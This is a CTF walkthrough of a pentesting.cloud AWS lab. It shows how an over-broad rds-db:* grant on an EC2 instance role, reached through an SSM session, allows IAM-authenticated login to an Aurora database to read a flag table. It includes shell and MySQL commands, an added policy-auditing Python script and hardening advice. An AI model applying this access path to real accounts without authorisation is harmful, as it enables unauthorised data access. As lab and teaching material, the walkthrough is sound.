CTF Walkthrough: pentesting.cloud "Aurora Borealis"
Steven Smiley
Posted on January 22, 2023
The pentesting.cloud challenge Aurora Borealis asks us to understand the permissions and the process required to connect to Aurora databases with AWS IAM authentication. It creates an Amazon Aurora DB cluster restored from a snapshot with unknown contents and configuration, an EC2 instance, and a user with limited permissions.
Finding a starting point
We examine the IAM roles and policies in the environment and see that there's an EC2 instance role that can rds-db:* on arn:aws:rds-db:us-west-2:*:dbuser:*/us-west-2. The rds-db:* wildcard covers every rds-db IAM action, including connecting to the database. It's important to read that ARN carefully because it reveals the database username we'll need. The ARN format of a db-user is arn:${Partition}:rds-db:${Region}:${Account}:dbuser:${DbiResourceId}/${DbUserName}. That's right, the username is us-west-2; it is not referring to the region.
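As an added example (not part of the original write-up), the following Python parses rds-db ARNs into their fields using the format above and audits an IAM policy for wildcard grants, which is how a reviewer would catch a grant like the one on the instance role; SAMPLE_POLICY is constructed to mirror that role.

```python
# Added example, not from the original post: parse rds-db ARNs of the form
# arn:${Partition}:rds-db:${Region}:${Account}:dbuser:${DbiResourceId}/${DbUserName}
# and flag wildcard grants in an IAM policy. SAMPLE_POLICY below is constructed.
from dataclasses import dataclass

@dataclass
class DbUserArn:
    partition: str
    region: str
    account: str
    resource_id: str
    db_user: str

def parse_rds_db_arn(arn: str) -> DbUserArn:
    # Split into the six colon-delimited ARN fields; the resource keeps its '/'.
    parts = arn.split(":", 5)
    if len(parts) != 6 or parts[0] != "arn" or parts[2] != "rds-db":
        raise ValueError(f"not an rds-db ARN: {arn}")
    _, partition, _, region, account, resource = parts
    kind, _, rest = resource.partition(":")
    if kind != "dbuser" or "/" not in rest:
        raise ValueError(f"unexpected rds-db resource: {resource}")
    resource_id, db_user = rest.split("/", 1)  # the trailing field is the DB username
    return DbUserArn(partition, region, account, resource_id, db_user)

def audit_policy(policy: dict) -> list[str]:
    """One finding per wildcard in an Allow statement that permits rds-db connect."""
    connect_actions = {"*", "rds-db:*", "rds-db:connect"}
    findings = []
    for stmt in policy.get("Statement", []):
        actions, resources = stmt.get("Action", []), stmt.get("Resource", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources
        if stmt.get("Effect") != "Allow" or not connect_actions & set(actions):
            continue
        for res in resources:
            if res == "*":
                findings.append("any DB user on any instance (Resource: *)")
                continue
            a = parse_rds_db_arn(res)
            if a.resource_id == "*":
                findings.append(f"user {a.db_user!r} on any DB instance in {a.region}")
            if a.db_user == "*":
                findings.append(f"any DB user on instance {a.resource_id}")
    return findings

# Constructed policy mirroring the EC2 instance role described in the write-up.
SAMPLE_POLICY = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow",
    "Action": "rds-db:*", "Resource": "arn:aws:rds-db:us-west-2:*:dbuser:*/us-west-2"}]}
```

Running audit_policy(SAMPLE_POLICY) reports that the user us-west-2 may connect to any DB instance in the region, which is exactly the over-broad DbiResourceId wildcard the challenge relies on.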
Since the permissions belong to the EC2 instance role, we need to connect from that instance. Conveniently, pentesting-user can ssm:StartSession on it.
Connecting to the DB
We start an SSM session on the EC2 instance so we can use its role's permissions to connect to the RDS database with IAM authentication. We first need to install the mysql client, download the RDS CA certificate bundle for the region, and generate an authentication token for the user.
sh-4.2$ sudo yum install mysql
sh-4.2$ wget https://truststore.pki.rds.amazonaws.com/us-west-2/us-west-2-bundle.pem
sh-4.2$ RDSHOST="aurora-dbcluster-yjt22bb5xqez.cluster-cmugjtcpbuo6.us-west-2.rds.amazonaws.com"
sh-4.2$ TOKEN="$(aws rds generate-db-auth-token --hostname $RDSHOST --port 1337 --region us-west-2 --username us-west-2)"
sh-4.2$ mysql --host=$RDSHOST --port=1337 --ssl-ca=us-west-2-bundle.pem --user=us-west-2 --password=$TOKEN
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 24
Server version: 5.7.12 MySQL Community Server (GPL)
MySQL [(none)]>
With the MySQL connection, let's explore the database to find the flag.
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| flags              |
+--------------------+
MySQL [(none)]> use flags;
Database changed
MySQL [flags]> show tables;
+-----------------+
| Tables_in_flags |
+-----------------+
| flag            |
+-----------------+
MySQL [flags]> describe flag;
+-------+--------------+------+-----+---------+-------+
| Field | Type         | Null | Key | Default | Extra |
+-------+--------------+------+-----+---------+-------+
| flag  | varchar(100) | YES  |     | NULL    |       |
+-------+--------------+------+-----+---------+-------+
MySQL [flags]> select * from flag;
+----------------------------------+
| flag                             |
+----------------------------------+
| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx |
+----------------------------------+
Improving AWS data protection
This challenge didn't involve many steps, but it required understanding how AWS IAM authentication to RDS works. To improve data protection with RDS:
- Be cognizant of which authentication mechanisms are enabled on each database, IAM database authentication included
- Grant users and roles the minimum permissions needed to perform their duties
- As much as possible, keep people away from data, limiting the potential access vectors